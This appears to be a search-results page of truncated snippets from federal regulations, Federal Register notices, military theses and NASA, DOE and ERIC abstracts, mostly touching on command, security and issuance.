A four stage model is presented for the control mode man-computer interface dialogue. It consists of context development, semantic development syntactic development, and command execution. Each stage is discussed in terms of the operator skill levels (naive, novice, competent, and expert) and pertinent human factors issues. These issues are human problem solving, human memory, and schemata. The execution stage is discussed in terms of the operators typing skills. This model provides an understanding of the human process in command mode activity for computer systems and a foundation for relating system characteristics to operator characteristics.
32 CFR 644.27 - Authority to issue Real Estate Directives.
Code of Federal Regulations, 2013 CFR
2013-07-01
..., Directorate of Engineering and Services, HQ, USAF. Major Air Commands and Air Force Regional Civil Engineers... Engineers will assign numbers to Real Estate Directives issued by Air Force Regional Civil Engineers. The...
Code of Federal Regulations, 2010 CFR
2010-04-01
... statements relating to securities to be issued in certain business combination transactions. 230.488 Section... REGULATIONS, SECURITIES ACT OF 1933 Investment Companies; Business Development Companies § 230.488 Effective date of registration statements relating to securities to be issued in certain business combination...
6 CFR 27.204 - Minimum concentration by security issue.
Code of Federal Regulations, 2010 CFR
2010-01-01
... 6 Domestic Security 1 2010-01-01 2010-01-01 false Minimum concentration by security issue. 27.204 Section 27.204 Domestic Security DEPARTMENT OF HOMELAND SECURITY, OFFICE OF THE SECRETARY CHEMICAL FACILITY ANTI-TERRORISM STANDARDS Chemical Facility Security Program § 27.204 Minimum concentration by...
Forest Service patrol captain and patrol commanders report: nationwide study
Deborah J. Chavez; Joanne F. Tynon
2007-01-01
This is the third in a series of studies to evaluate perceptions of USDA Forest Service law enforcement personnel of the roles, responsibilities, and issues entailed in their jobs. An e-mail survey was administered to the 79 Forest Service patrol captains and patrol commanders (PCs) across the United States. Seventy completed and returned the questionnaire....
6 CFR 13.6 - Prerequisites for issuing a Complaint.
Code of Federal Regulations, 2010 CFR
2010-01-01
... 6 Domestic Security 1 2010-01-01 2010-01-01 false Prerequisites for issuing a Complaint. 13.6 Section 13.6 Domestic Security DEPARTMENT OF HOMELAND SECURITY, OFFICE OF THE SECRETARY PROGRAM FRAUD CIVIL REMEDIES § 13.6 Prerequisites for issuing a Complaint. (a) The Reviewing Official may issue a...
2016-06-10
7. PERFORMING ORGANIZATION NAME( S ) AND ADDRESS(ES) U.S. Army Command and General Staff College ATTN: ATZL-SWD-GD Fort Leavenworth, KS 66027-2301...AND STABILITY IN THE SAHEL REGION A thesis presented to the Faculty of the U.S. Army Command and General Staff College in partial...5b. GRANT NUMBER 5c. PROGRAM ELEMENT NUMBER 6. AUTHOR( S ) Bekaye Samake, MAJ 5d. PROJECT NUMBER 5e. TASK NUMBER 5f. WORK UNIT NUMBER
The new Mobile Command Center at KSC is important addition to emergency preparedness
NASA Technical Reports Server (NTRS)
2000-01-01
Charles Street, Roger Scheidt and Robert ZiBerna, the Emergency Preparedness team at KSC, sit in the conference room inside the Mobile Command Center, a specially equipped vehicle. Nicknamed '''The Brute,''' it also features computer work stations, mobile telephones and a fax machine. It also can generate power with its onboard generator. Besides being ready to respond in case of emergencies during launches, the vehicle must be ready to help address fires, security threats, chemical spills, terrorist attaches, weather damage or other critical situations that might face KSC or Cape Canaveral Air Force Station.
The new Mobile Command Center at KSC is important addition to emergency preparedness
NASA Technical Reports Server (NTRS)
2000-01-01
Robert ZiBerna, Roger Scheidt and Charles Street, the Emergency Preparedness team at KSC, practice for an emergency scenario inside the Mobile Command Center, a specially equipped vehicle. It features a conference room, computer work stations, mobile telephones and a fax machine. It also can generate power with its onboard generator. Besides being ready to respond in case of emergencies during launches, the vehicle must be ready to help address fires, security threats, chemical spills, terrorist attaches, weather damage or other critical situations that might face KSC or Cape Canaveral Air Force Station.
Changing Homeland Security: The Year in Review - 2008
2009-01-01
new opportunities for terrorist safe havens. The specter of homegrown terrorism has not abated. Naturalized citizens of Somali descent traveled to...34 • The Nature of Homeland Security: Now a Second Tier Policy Issue? • Organizing for Homeland Security: Possible Futures, Emerging Issues • The...emerging definitions of the homeland security mission space in 2009. The Nature of Homeland Security: Now a Second Tier Policy Issue? Has the bar
Winds of Change: The Future of the 32D Army Air Defense Command in U.S. Army Europe
1990-04-25
EDITION OF INOV S IS. OBSOLETE SECURITY CLASSIFICATION OF THIS PA.E e’Whe, Pate Fntrrpd) * A SECURITY CLASSIFICATION OF THIS PAGE(’Wlho Dal Entamd...Czechoslovakia and Poland have all announced reductions in their defenses and a reorientation of forces to a national defense role. In addition, these...5,000 tanks (later increased to 5,300 tanks and to include Poland ); *Reduce Soviet forces in Eastern Europe and Western Soviet Union by 10,000 tanks
To Enable and Sustain: Pacific Air Forces’ Theater Security Cooperation as a Line of Operation
2015-02-01
security cooperation mechanisms already in place are evolving into a more sequenced and deliberate plan towards a defined cooperative end state. This...alignment of higher guidance and is designed to advise and guide the command’s activities in the region. Joint in its es- sence , it communicates and...face of crises, it is far better to prevent them from occurring in the first place , establish cooperative arrangements ahead of time, and reduce
The New European Security Calculus: Implications for the U.S. Army
1991-01-03
Iberian and Levantine allies) is anxious that "peace" in Central Europe could work to decouple its security concerns from its northern neighbors. 10 4...altered political climate in Europe, the U.S. Army must be proactive in changing its force and command and control structures to meet both its new...relocated to the Kola Peninsula . "The main task of these planes is to attack targets from the rear, and their range makes it possible for them to reach
Security Behavior Observatory: Infrastructure for Long-term Monitoring of Client Machines
2014-07-14
desired data. In Wmdows, this is most often a .NET language (e.g., C#, PowerShell), a command-line batch script, or Java . 3) Least privilege: To ensure...modules are written in Java , and thus should be easily-portable to any OS. B. Deployment There are several high-level requirements the SBO must meet...practically feasible with such solutions. Instead, one researcher with access to all the clients’ keys (stored in an isolated and secured MySQL database
2009-06-12
A thesis presented to the Faculty of the U.S. Army Command and General Staff College in partial fulfillment of the requirements for the...other provision of law, no person shall be subject to any penalty for failing to comply with a collection of information if it does not display a ...Violence and National Security in Nigeria: Nigeria is a multi-religious and multi-ethnic society with enormous potential for economic, social, and
2013-04-08
are the ultimate response authority in their particular city, county , or state. Therefore, a suggestion that the active duty military should “certify...Security, 2010. Pg vii. 5 Steven Bowman . Homeland Security: The Department of Defense’s Role. Congressional Research Service, Washington: The...Library of Congress, 2003. Bowman XX. 6 9/11 Commission. "National Commission on the Terrorist Attacks Upon the United States." 2004. Pg 395 7 DHS, U.S
31 CFR 356.4 - What are the book-entry systems in which auctioned Treasury securities may be issued?
Code of Federal Regulations, 2010 CFR
2010-07-01
... in which auctioned Treasury securities may be issued? There are three book-entry securities systems... marketable Treasury securities. We maintain and transfer securities in these three book-entry systems at... inflation. Securities may be transferred from one system to the other, unless the securities are not...
Code of Federal Regulations, 2011 CFR
2011-07-01
... 33 Navigation and Navigable Waters 1 2011-07-01 2011-07-01 false Training. 5.19 Section 5.19 Navigation and Navigable Waters COAST GUARD, DEPARTMENT OF HOMELAND SECURITY GENERAL COAST GUARD AUXILIARY § 5.19 Training. The Commandant may authorize members of the Auxiliary to pursue correspondence...
Code of Federal Regulations, 2010 CFR
2010-07-01
... 33 Navigation and Navigable Waters 1 2010-07-01 2010-07-01 false Training. 5.19 Section 5.19 Navigation and Navigable Waters COAST GUARD, DEPARTMENT OF HOMELAND SECURITY GENERAL COAST GUARD AUXILIARY § 5.19 Training. The Commandant may authorize members of the Auxiliary to pursue correspondence...
76 FR 6694 - Drawbridge Operation Regulation; Upper Mississippi River, Keokuk, IA
Federal Register 2010, 2011, 2012, 2013, 2014
2011-02-08
... DEPARTMENT OF HOMELAND SECURITY Coast Guard 33 CFR Part 117 [Docket Number USCG-2011-0029] Drawbridge Operation Regulation; Upper Mississippi River, Keokuk, IA AGENCY: Coast Guard, DHS. ACTION: Notice of temporary deviation from regulations. SUMMARY: The Commander, Eighth Coast Guard District, has...
77 FR 40779 - Assignment of National Security and Emergency Preparedness Communications Functions
Federal Register 2010, 2011, 2012, 2013, 2014
2012-07-11
.... The Executive Committee shall be composed of Assistant Secretary-level or equivalent representatives... convening of governmental and nongovernmental groups (consistent with the Federal Advisory Committees Act... President, White House staff, heads of state and government, and Nuclear Command and Control leadership...
Code of Federal Regulations, 2010 CFR
2010-07-01
... 33 Navigation and Navigable Waters 1 2010-07-01 2010-07-01 false Organization. 5.05 Section 5.05 Navigation and Navigable Waters COAST GUARD, DEPARTMENT OF HOMELAND SECURITY GENERAL COAST GUARD AUXILIARY § 5.05 Organization. The Auxiliary is a nonmilitary organization administered by the Commandant, under...
10. Photocopy of photograph, 1945 (original print on file at ...
10. Photocopy of photograph, 1945 (original print on file at U.S. Army Intelligence Security Command, Fort Belvoir, Virginia). AIR VIEW OF ARLINGTON HALL STATION SHOWING EXTENT OF BOUNDARY LINES. VIEW TO NORTH. - Arlington Hall Station, 4000 Arlington Boulevard, Arlington, Arlington County, VA
15. Photocopy of photograph, 1942 (original print on file at ...
15. Photocopy of photograph, 1942 (original print on file at U.S. Army Intelligence Security Command, Fort Belvoir, Virginia). VIEW OF CONSTRUCTION OF BUILDING 401. NOTE PLATFORM-TYPE CONSTRUCTION. - Arlington Hall Station, Building No. 401, 4000 Arlington Boulevard, Arlington, Arlington County, VA
29. Photocopy of photograph, ca. 1930 (original print on file ...
29. Photocopy of photograph, ca. 1930 (original print on file at U.S. Army Intelligence Security Command, Fort Belvoir, Virginia). VIEW TO SOUTHEAST OF MAIN BUILDING OF ARLINGTON HALL JUNIOR COLLEGE. - Arlington Hall Station, Main Building, 4000 Arlington Boulevard, Arlington, Arlington County, VA
17. Photocopy of photograph, 1942 (original print on file at ...
17. Photocopy of photograph, 1942 (original print on file at U.S. Army Intelligence Security Command, Fort Belvoir, Virginia). VIEW TO SOUTH OF INTERIOR OF ONE OF BUILDING'S WINGS. - Arlington Hall Station, Building No. 401, 4000 Arlington Boulevard, Arlington, Arlington County, VA
Code of Federal Regulations, 2011 CFR
2011-07-01
... VESSELS CARRYING OIL, NOXIOUS LIQUID SUBSTANCES, GARBAGE, MUNICIPAL OR COMMERCIAL WASTE, AND BALLAST WATER Transportation of Municipal and Commercial Waste § 151.1021 Appeals. (a) Any person directly affected by an... ruling to the Assistant Commandant for Marine Safety, Security, and Stewardship (CG-5), U.S. Coast Guard...
RESPONSIBILITY CENTCOM COALITION MEDIA SOCIAL MEDIA NEWS ARTICLES PRESS RELEASES IMAGERY VIDEOS TRANSCRIPTS VISITORS AND PERSONNEL FAMILY CENTER FAMILY READINESS CENTCOM WEBMAIL SOCIAL MEDIA SECURITY ACCOUNTABILITY HomeMEDIASOCIAL MEDIA Social Media CENTCOM'S ENGLISH SOCIAL MEDIA ACCOUNTS There are many U.S. military commands
Code of Federal Regulations, 2011 CFR
2011-07-01
... 33 Navigation and Navigable Waters 2 2011-07-01 2011-07-01 false Delegations. 160.5 Section 160.5 Navigation and Navigable Waters COAST GUARD, DEPARTMENT OF HOMELAND SECURITY (CONTINUED) PORTS AND WATERWAYS SAFETY PORTS AND WATERWAYS SAFETY-GENERAL General § 160.5 Delegations. (a) District Commanders and...
Code of Federal Regulations, 2010 CFR
2010-07-01
... 33 Navigation and Navigable Waters 2 2010-07-01 2010-07-01 false Delegations. 160.5 Section 160.5 Navigation and Navigable Waters COAST GUARD, DEPARTMENT OF HOMELAND SECURITY (CONTINUED) PORTS AND WATERWAYS SAFETY PORTS AND WATERWAYS SAFETY-GENERAL General § 160.5 Delegations. (a) District Commanders and...
76 FR 55057 - Privacy Act of 1974; System of Records
Federal Register 2010, 2011, 2012, 2013, 2014
2011-09-06
... Records. System location: U.S. Army Human Resources Command, Education Incentives Branch, 1600 Spearhead... Social Security Number (SSN); Military Occupational Specialty (MOS). Student Loan: Qualifying student loan name, amount of loan, date of loan transaction, student education loan number assigned by the...
76 FR 33773 - Navigation Safety Advisory Council; Vacancies
Federal Register 2010, 2011, 2012, 2013, 2014
2011-06-09
... advice and recommendations to the Secretary, Department of Homeland Security, through the Commandant of..., routing measures, marine information, diving safety, and aids to navigation systems. DATES: Applicants... 5 U.S.C. App. (Pub. L. 92-463). NAVSAC provides advice and recommendations to the Secretary, through...
Code of Federal Regulations, 2010 CFR
2010-10-01
... component of DOT and includes the Under Secretary for Security, the Commandant of the Coast Guard, the Inspector General, and the Director of the Bureau of Transportation Statistics. Concurrence means that the... preserved. The term also includes any such documentary material stored by computer. Responsible DOT official...
Code of Federal Regulations, 2013 CFR
2013-10-01
... component of DOT and includes the Under Secretary for Security, the Commandant of the Coast Guard, the Inspector General, and the Director of the Bureau of Transportation Statistics. Concurrence means that the... preserved. The term also includes any such documentary material stored by computer. Responsible DOT official...
Code of Federal Regulations, 2012 CFR
2012-10-01
... component of DOT and includes the Under Secretary for Security, the Commandant of the Coast Guard, the Inspector General, and the Director of the Bureau of Transportation Statistics. Concurrence means that the... preserved. The term also includes any such documentary material stored by computer. Responsible DOT official...
77 FR 72278 - Sale and Issue of Marketable Book-Entry Treasury Bills, Notes, and Bonds
Federal Register 2010, 2011, 2012, 2013, 2014
2012-12-05
... whether it would be more important to issue a new floating rate security each month. Maturities: We intend.... SUMMARY: The Department of the Treasury (``Treasury'') intends to issue a new type of marketable security... security. We also invite other comments relevant to the issuance of this new security. DATES: Submit...
System Security And Monitoring On Smart Home Using Android
NASA Astrophysics Data System (ADS)
Romadhon, A. S.
2018-01-01
Home security system is needed for homeowners who have a lot of activities, as a result, they often leave the house without locking the door and even leave the house in a state of lights that are not lit. In order to overcome this case, a system that can control and can monitor the state of the various devices contained in the house or smart home system is urgently required. The working principle of this smart home using android is when the homeowner sends a certain command using android, the command will be forwarded to the microcontroller and then it will be executed based on the parameters that have been determined. For example, it can turn off and on the light using android app. In this study, testing was conducted to a smart home prototype which is equipped with light bulbs, odour sensors, heat sensors, ultrasonic sensors, LDR, buzzer and camera. The test results indicate that the application has been able to control all the sensors of home appliances well.
17 CFR 250.52 - Exemption of issue and sale of certain securities.
Code of Federal Regulations, 2010 CFR
2010-04-01
... business of the subsidiary company; and (2) The interest rates and maturity dates of any debt security... 17 Commodity and Securities Exchanges 3 2010-04-01 2010-04-01 false Exemption of issue and sale of certain securities. 250.52 Section 250.52 Commodity and Securities Exchanges SECURITIES AND EXCHANGE...
6 CFR 27.204 - Minimum concentration by security issue.
Code of Federal Regulations, 2011 CFR
2011-01-01
... Section 27.204 Domestic Security DEPARTMENT OF HOMELAND SECURITY, OFFICE OF THE SECRETARY CHEMICAL FACILITY ANTI-TERRORISM STANDARDS Chemical Facility Security Program § 27.204 Minimum concentration by security issue. (a) Release Chemicals—(1) Release-Toxic Chemicals. If a release-toxic chemical of interest...
USN/USMC Commander’s Quick Reference Legal Handbook
2015-01-01
compounds of designer drugs. [See references (a), (f), and (g).] Commanders shall obtain authorization for testing for synthetic drug compounds from...17 Pre-Trial Agreements 19 Post -Trial Review 21 Victim/Witness Issues 23 Section II: Administrative...advocate except in extraordinary circumstances. Only flag or general officers (and a very few specifically designated non-flag/general officers who are
Research into command, control, and communications in space construction
NASA Technical Reports Server (NTRS)
Davis, Randal
1990-01-01
Coordinating and controlling large numbers of autonomous or semi-autonomous robot elements in a space construction activity will present problems that are very different from most command and control problems encountered in the space business. As part of our research into the feasibility of robot constructors in space, the CSC Operations Group is examining a variety of command, control, and communications (C3) issues. Two major questions being asked are: can we apply C3 techniques and technologies already developed for use in space; and are there suitable terrestrial solutions for extraterrestrial C3 problems? An overview of the control architectures, command strategies, and communications technologies that we are examining is provided and plans for simulations and demonstrations of our concepts are described.
ERIC Educational Resources Information Center
Ragothaman, Srinivasan; Lavin, Angeline; Davies, Thomas
2007-01-01
This research examines, through survey administration, the perceptions of accounting practitioners and educators with respect to the multi-faceted security issues of e-commerce payment systems as well as e-business curriculum issues. Specific security issues explored include misuse/theft of personal and credit card information, spam e-mails,…
46 CFR 45.11 - Issue of load line certificate.
Code of Federal Regulations, 2010 CFR
2010-10-01
... 46 Shipping 2 2010-10-01 2010-10-01 false Issue of load line certificate. 45.11 Section 45.11... § 45.11 Issue of load line certificate. (a) A vessel 79 feet in length and more, and 150 gross tons or... issue of a load line certificate under this part by the Commandant or his authorized representative. (c...
Women in Combat: Is the Current Policy Obsolete
2007-02-23
gender issues were cited by fewer than 1 percent of their respondents when asked about issues that affect morale in recently gender -integrated units...37 GENDER ISSUES /POLICIES THAT EFFECT MILITARY CAPABILITY..................42 Pregnancy... Gender Issues ,” Report No. GAO/NSAID-99-7, 19 October 1998, p. 4. 2 personal experiences as a combat pilot and military commander frame my
33 CFR 118.140 - Painting bridge piers.
Code of Federal Regulations, 2011 CFR
2011-07-01
... 33 Navigation and Navigable Waters 1 2011-07-01 2011-07-01 false Painting bridge piers. 118.140 Section 118.140 Navigation and Navigable Waters COAST GUARD, DEPARTMENT OF HOMELAND SECURITY BRIDGES BRIDGE LIGHTING AND OTHER SIGNALS § 118.140 Painting bridge piers. The District Commander may require...
41. Upper level, electronic racks, left to rightprogrammer group, status ...
41. Upper level, electronic racks, left to right--programmer group, status command message processing group, UHF radio, impss rack security - Ellsworth Air Force Base, Delta Flight, Launch Facility, On County Road T512, south of Exit 116 off I-90, Interior, Jackson County, SD
76 FR 3516 - Drawbridge Operation Regulations; Merrimack River, Newburyport and Salisbury, MA
Federal Register 2010, 2011, 2012, 2013, 2014
2011-01-20
... DEPARTMENT OF HOMELAND SECURITY Coast Guard 33 CFR Part 117 [Docket No. USCG-2010-1134] Drawbridge Operation Regulations; Merrimack River, Newburyport and Salisbury, MA AGENCY: Coast Guard, DHS. ACTION: Notice of temporary deviation from regulations. SUMMARY: The Commander, First Coast Guard District, has...
46 CFR 1.01-10 - Organization.
Code of Federal Regulations, 2011 CFR
2011-10-01
... GUARD, DEPARTMENT OF HOMELAND SECURITY PROCEDURES APPLICABLE TO THE PUBLIC ORGANIZATION, GENERAL COURSE... Organization. (a) The Commandant is the head of the agency and exercises overall direction over the policy and administration of the Coast Guard. (b) To carry out the regulatory and enforcement aspects of marine safety, the...
Code of Federal Regulations, 2014 CFR
2014-10-01
... 46 Shipping 3 2014-10-01 2014-10-01 false Definitions. 70.10-1 Section 70.10-1 Shipping COAST GUARD, DEPARTMENT OF HOMELAND SECURITY (CONTINUED) PASSENGER VESSELS GENERAL PROVISIONS Definition of Terms Used in This Subchapter § 70.10-1 Definitions. Approved means approved by the Commandant, unless...
Code of Federal Regulations, 2012 CFR
2012-10-01
... 46 Shipping 3 2012-10-01 2012-10-01 false Definitions. 70.10-1 Section 70.10-1 Shipping COAST GUARD, DEPARTMENT OF HOMELAND SECURITY (CONTINUED) PASSENGER VESSELS GENERAL PROVISIONS Definition of Terms Used in This Subchapter § 70.10-1 Definitions. Approved means approved by the Commandant, unless...
Code of Federal Regulations, 2011 CFR
2011-10-01
... 46 Shipping 3 2011-10-01 2011-10-01 false Definitions. 70.10-1 Section 70.10-1 Shipping COAST GUARD, DEPARTMENT OF HOMELAND SECURITY (CONTINUED) PASSENGER VESSELS GENERAL PROVISIONS Definition of Terms Used in This Subchapter § 70.10-1 Definitions. Approved means approved by the Commandant, unless...
Code of Federal Regulations, 2013 CFR
2013-10-01
... 46 Shipping 3 2013-10-01 2013-10-01 false Definitions. 70.10-1 Section 70.10-1 Shipping COAST GUARD, DEPARTMENT OF HOMELAND SECURITY (CONTINUED) PASSENGER VESSELS GENERAL PROVISIONS Definition of Terms Used in This Subchapter § 70.10-1 Definitions. Approved means approved by the Commandant, unless...
78 FR 62329 - Special Local Regulation; Tennessee River, Miles 255.0 to 256.5, Florence, AL
Federal Register 2010, 2011, 2012, 2013, 2014
2013-10-17
... pursuant to authority under section 4(a) of the Administrative Procedure Act (APA) (5 U.S.C. 553(b)). This... Security Management Directive 023-01 and Commandant Instruction M16475.lD, which guide the Coast Guard in...
Natural Disaster & Crisis Management in School Districts and Community Colleges.
ERIC Educational Resources Information Center
Florida State Dept. of Education, Tallahassee. Office of Educational Facilities.
This document provides school districts and community colleges in Florida with guidance on disaster preparedness planning and management for all types of disasters. Procedures include those for insurance coverage, emergency shelters, command centers and disaster team organization, emergency communications, security, preparation prior to disaster,…
NOAA Homeland Security Program Office
Emergency Managment Institute IS 100.b - Introduction to Incident Command System IS 700.a - NIMS An Introduction IS 701.b - NIMS Multiagency Coordination System (MACS) Course IS 800.b - National Response Framework, An Introduction United States Coast Guard; Maritime Domain Awareness Privacy Act Statement
Code of Federal Regulations, 2012 CFR
2012-10-01
..., DEPARTMENT OF HOMELAND SECURITY (CONTINUED) MARINE ENGINEERING MARINE PORTABLE TANKS AND CARGO HANDLING SYSTEMS General § 64.3 Applicability. (a) This part applies to each MPT for which the Commanding Officer.... (b) Subpart F of this part also applies to portable tanks and to cargo-handling systems for portable...
Code of Federal Regulations, 2011 CFR
2011-10-01
..., DEPARTMENT OF HOMELAND SECURITY (CONTINUED) MARINE ENGINEERING MARINE PORTABLE TANKS AND CARGO HANDLING SYSTEMS General § 64.3 Applicability. (a) This part applies to each MPT for which the Commanding Officer.... (b) Subpart F of this part also applies to portable tanks and to cargo-handling systems for portable...
Code of Federal Regulations, 2013 CFR
2013-10-01
..., DEPARTMENT OF HOMELAND SECURITY (CONTINUED) MARINE ENGINEERING MARINE PORTABLE TANKS AND CARGO HANDLING SYSTEMS General § 64.3 Applicability. (a) This part applies to each MPT for which the Commanding Officer.... (b) Subpart F of this part also applies to portable tanks and to cargo-handling systems for portable...
Code of Federal Regulations, 2014 CFR
2014-10-01
..., DEPARTMENT OF HOMELAND SECURITY (CONTINUED) MARINE ENGINEERING MARINE PORTABLE TANKS AND CARGO HANDLING SYSTEMS General § 64.3 Applicability. (a) This part applies to each MPT for which the Commanding Officer.... (b) Subpart F of this part also applies to portable tanks and to cargo-handling systems for portable...
Life of an Idea: DLIFLC Annual Program Review.
ERIC Educational Resources Information Center
Woytak, Lidia
1999-01-01
Discusses the Defense Language Institute's Foreign Language Center's (DLIFLC) annual program review. Representatives from the Army, Air Force, Marine Corps, HQ TRADOC, National Security Agency, Defense Intelligence Agency, and the Office of the Assistant Secretary of Defense for Command, Control, Communication, and Intelligence met to discuss…
Joint Targeting and Air Support in Counterinsurgency: How to Move to Mission Command
2012-10-01
pdf. 39. Rhodesia fought a COIN against communist guerillas in 1964–79. Under crushing sanctions and with little manpower, the Rhodesians developed a...Rhodesian Forces Anti Terrorist Operations Counter Insurgency Manuals (Salisbury, Rhodesia : Rhodesian Security Forces, 1975), 212. 41. Darling and
19 CFR 122.42 - Aircraft entry.
Code of Federal Regulations, 2011 CFR
2011-04-01
... Duties U.S. CUSTOMS AND BORDER PROTECTION, DEPARTMENT OF HOMELAND SECURITY; DEPARTMENT OF THE TREASURY... aircraft commander or an agent. (b) Place of entry—(1) First landing at international airport. Entry shall be made at the international airport at which first landing is made. (2) First landing at another...
19 CFR 122.42 - Aircraft entry.
Code of Federal Regulations, 2014 CFR
2014-04-01
... Duties U.S. CUSTOMS AND BORDER PROTECTION, DEPARTMENT OF HOMELAND SECURITY; DEPARTMENT OF THE TREASURY... aircraft commander or an agent. (b) Place of entry—(1) First landing at international airport. Entry shall be made at the international airport at which first landing is made. (2) First landing at another...
19 CFR 122.42 - Aircraft entry.
Code of Federal Regulations, 2012 CFR
2012-04-01
... Duties U.S. CUSTOMS AND BORDER PROTECTION, DEPARTMENT OF HOMELAND SECURITY; DEPARTMENT OF THE TREASURY... aircraft commander or an agent. (b) Place of entry—(1) First landing at international airport. Entry shall be made at the international airport at which first landing is made. (2) First landing at another...
19 CFR 122.42 - Aircraft entry.
Code of Federal Regulations, 2013 CFR
2013-04-01
... Duties U.S. CUSTOMS AND BORDER PROTECTION, DEPARTMENT OF HOMELAND SECURITY; DEPARTMENT OF THE TREASURY... aircraft commander or an agent. (b) Place of entry—(1) First landing at international airport. Entry shall be made at the international airport at which first landing is made. (2) First landing at another...
33 CFR 118.140 - Painting bridge piers.
Code of Federal Regulations, 2010 CFR
2010-07-01
... 33 Navigation and Navigable Waters 1 2010-07-01 2010-07-01 false Painting bridge piers. 118.140 Section 118.140 Navigation and Navigable Waters COAST GUARD, DEPARTMENT OF HOMELAND SECURITY BRIDGES BRIDGE LIGHTING AND OTHER SIGNALS § 118.140 Painting bridge piers. The District Commander may require...
The Perfect Storm: The Goldwater-Nichols Act and Its Effect on Navy Acquisition
2010-01-01
TECHNOLOGY SUBSTANCE ABUSE TERRORISM AND HOMELAND SECURITY TRANSPORTATION AND INFRASTRUCTURE WORKFORCE AND WORKPLACE The RAND Corporation is a nonprofit...the two stars’ comunications with the Systems Commanders, who were ultimately removed from the acquisition chain because the new PEOs 16 The
Sandia National Laboratories proof-of-concept robotic security vehicle
DOE Office of Scientific and Technical Information (OSTI.GOV)
Harrington, J.J.; Jones, D.P.; Klarer, P.R.
1989-01-01
Several years ago Sandia National Laboratories developed a prototype interior robot that could navigate autonomously inside a large complex building to air and test interior intrusion detection systems. Recently the Department of Energy Office of Safeguards and Security has supported the development of a vehicle that will perform limited security functions autonomously in a structured exterior environment. The goal of the first phase of this project was to demonstrate the feasibility of an exterior robotic vehicle for security applications by using converted interior robot technology, if applicable. An existing teleoperational test bed vehicle with remote driving controls was modified andmore » integrated with a newly developed command driving station and navigation system hardware and software to form the Robotic Security Vehicle (RSV) system. The RSV, also called the Sandia Mobile Autonomous Navigator (SANDMAN), has been successfully used to demonstrate that teleoperated security vehicles which can perform limited autonomous functions are viable and have the potential to decrease security manpower requirements and improve system capabilities. 2 refs., 3 figs.« less
Self-Reliability and Motivation in a Nuclear Security Culture Enhancement Program
DOE Office of Scientific and Technical Information (OSTI.GOV)
Rogers,E.; deBoer,G.; Crawford, C.
2009-10-19
The threat of nuclear terrorism has become a global concern. Many countries continue to make efforts to strengthen nuclear security by enhancing systems of nuclear material protection, control, and accounting (MPC&A). Though MPC&A systems can significantly upgrade nuclear security, they do not eliminate the "human factor." Gen. Eugene Habiger, a former "Assistant Secretary for Safeguards and Security" at the U.S. Department of Energy’s (DOE) nuclear-weapons complex and a former commander of U.S. strategic nuclear forces, has observed that "good security is 20% equipment and 80% people." Although eliminating the "human factor" is not possible, accounting for and mitigating the riskmore » of the insider threat is an essential element in establishing an effective nuclear security culture. This paper will consider the organizational role in mitigating the risk associated with the malicious insider through monitoring and enhancing human reliability and motivation as well as enhancing the nuclear security culture.« less
6 CFR 27.203 - Calculating the screening threshold quantity by security issue.
Code of Federal Regulations, 2014 CFR
2014-01-01
... 6 Domestic Security 1 2014-01-01 2014-01-01 false Calculating the screening threshold quantity by security issue. 27.203 Section 27.203 Domestic Security DEPARTMENT OF HOMELAND SECURITY, OFFICE OF THE SECRETARY CHEMICAL FACILITY ANTI-TERRORISM STANDARDS Chemical Facility Security Program § 27.203 Calculating the screening threshold quantity by...
6 CFR 27.203 - Calculating the screening threshold quantity by security issue.
Code of Federal Regulations, 2011 CFR
2011-01-01
... 6 Domestic Security 1 2011-01-01 2011-01-01 false Calculating the screening threshold quantity by security issue. 27.203 Section 27.203 Domestic Security DEPARTMENT OF HOMELAND SECURITY, OFFICE OF THE SECRETARY CHEMICAL FACILITY ANTI-TERRORISM STANDARDS Chemical Facility Security Program § 27.203 Calculating the screening threshold quantity by...
6 CFR 27.203 - Calculating the screening threshold quantity by security issue.
Code of Federal Regulations, 2013 CFR
2013-01-01
... 6 Domestic Security 1 2013-01-01 2013-01-01 false Calculating the screening threshold quantity by security issue. 27.203 Section 27.203 Domestic Security DEPARTMENT OF HOMELAND SECURITY, OFFICE OF THE SECRETARY CHEMICAL FACILITY ANTI-TERRORISM STANDARDS Chemical Facility Security Program § 27.203 Calculating the screening threshold quantity by...
6 CFR 27.203 - Calculating the screening threshold quantity by security issue.
Code of Federal Regulations, 2010 CFR
2010-01-01
... 6 Domestic Security 1 2010-01-01 2010-01-01 false Calculating the screening threshold quantity by security issue. 27.203 Section 27.203 Domestic Security DEPARTMENT OF HOMELAND SECURITY, OFFICE OF THE SECRETARY CHEMICAL FACILITY ANTI-TERRORISM STANDARDS Chemical Facility Security Program § 27.203 Calculating the screening threshold quantity by...
Immigration Reform and Related Issues. Perspectivas Publicas. Issue Update.
ERIC Educational Resources Information Center
National Council of La Raza, Washington, DC.
Asserting that immigration reform and related issues have commanded sustained attention in the opening weeks of the 99th Congress, this paper provides an overview of important developments in this area, and highlights steps taken by the National Council of La Raza to help shape these developments. The developments discussed include: (1) The…
17 CFR 270.2a-7 - Money market funds.
Code of Federal Regulations, 2012 CFR
2012-04-01
... Security) issued by a Special Purpose Entity (as defined in this paragraph), substantially all of the...) Conduit security means a security issued by a Municipal Issuer (as defined in this paragraph) involving an..., which arrangement or agreement provides for or secures repayment of the security. Municipal issuer means...
17 CFR 270.2a-7 - Money market funds.
Code of Federal Regulations, 2013 CFR
2013-04-01
... Security) issued by a Special Purpose Entity (as defined in this paragraph), substantially all of the...) Conduit security means a security issued by a Municipal Issuer (as defined in this paragraph) involving an..., which arrangement or agreement provides for or secures repayment of the security. Municipal issuer means...
17 CFR 270.2a-7 - Money market funds.
Code of Federal Regulations, 2011 CFR
2011-04-01
... Security) issued by a Special Purpose Entity (as defined in this paragraph), substantially all of the...) Conduit Security means a security issued by a Municipal Issuer (as defined in this paragraph) involving an..., which arrangement or agreement provides for or secures repayment of the security. Municipal Issuer means...
17 CFR 270.2a-7 - Money market funds.
Code of Federal Regulations, 2014 CFR
2014-04-01
... Security) issued by a Special Purpose Entity (as defined in this paragraph), substantially all of the...) Conduit security means a security issued by a Municipal Issuer (as defined in this paragraph) involving an..., which arrangement or agreement provides for or secures repayment of the security. Municipal issuer means...
17 CFR 450.4 - Custodial holdings of government securities.
Code of Federal Regulations, 2010 CFR
2010-04-01
... appropriate regulatory agency that expressly govern securities lending practices. (b)(1) Except as otherwise... security (or the amount of each issue of a government security issued in book-entry form) held for the.... (d) Counts of government securities held for customers in both definitive and book-entry form shall...
Leaders in space: Mission commanders and crew on the International Space Station
NASA Astrophysics Data System (ADS)
Brcic, Jelena
